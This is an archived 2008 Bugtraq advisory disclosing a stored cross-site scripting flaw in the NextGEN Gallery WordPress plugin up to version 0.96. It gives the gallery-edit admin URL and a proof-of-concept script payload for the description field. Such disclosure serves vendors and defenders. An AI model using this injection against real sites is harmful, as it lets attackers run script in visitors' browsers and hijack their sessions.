XSS - NEXTGEN GALLERY 0.96 WORDPRESS PLUGIN

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS - NEXTGEN GALLERY 0.96 WORDPRESS PLUGIN
From: "Eduardo Jorge" <serrano.neves@xxxxxxxxx>
Date: Sat, 7 Jun 2008 23:07:36 -0300
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to :subject:mime-version:content-type:content-transfer-encoding :content-disposition; bh=EoDPa1tg4VqvH1xjtKKUeLxxs0C5U0MxcoUni51A+ho=; b=cEaDdiRN4AItDgj/vJEd1Kn6AXfFiTyAVP345zhENP8vhphFBx8izynTGqN7uszl/4 U7adgIsW23CBC67pJV6jUSCYnGYDQFM6lhmzGXCakZdnr8Qtn5VbEoBmc+OTWvETjAXa pPtwhMEiCm+Hsgteu41Q/EFX9nnlt/bzyKlvU=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type :content-transfer-encoding:content-disposition; b=mxMKd6cX2bI1H/Bx3l+3IlMpoSJ3CEwy5J7biFZRmM44BtOHn/v3hLUmCEYUW15Aq5 QYp1vsbK1H1Bk0WL4166bzjvrX2MNDxurJyVyHSJol6uaQrQOIVBjYDKfTcEPQil4pjJ VRf/oeDOIQZ9PWsDaHUydGsLPeaj52PXAeER0=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

==============================

XSS - Nextgen gallery 0.96 wordpress plugin

==============================

Author: Eduardo Neves a.k.a _eth0_
Date: 07 june 2008
Site: webappsecurity.wordpress.com

—————————————

APPLICATION : Nextgen gallery
VERSION : <= 0.96
VENDOR : http://wordpress.org/extend/plugins/nextgen-gallery/
DOWNLOAD : http://wordpress.org/extend/plugins/nextgen-gallery/

—————————————

IMPACT: XSS, XSRF, etc….

—————————————

Descrition:

This vulnerability can be explored writing in the descritption textbox
a mailicous (or not) code

link: 
http://[host]/[directory]/wp-admin/admin.php?page=nggallery-manage-gallery&mode=edit&gid=[galleryID]&_wpnonce=0b3c0996ed

In the description textbox write the text:

<script>alert('xss');</script>

And when the gallery was posted, user click in photo and the script
was executed!

-- 
|_|0|_| Serrano Neves - a.k.a eth0
|_|_|0| http://webappsecurity.wordpress.com
|0|0|0| "Talk is cheap. Show me the code." - Linus Torvalds

Prev by Date: [SECURITY] [DSA 1592-1] New Linux 2.6.18 packages fix overflow conditions
Next by Date: webTA by kronos - XSS
Previous by thread: [SECURITY] [DSA 1592-1] New Linux 2.6.18 packages fix overflow conditions
Next by thread: webTA by kronos - XSS
Index(es):
- Date
- Thread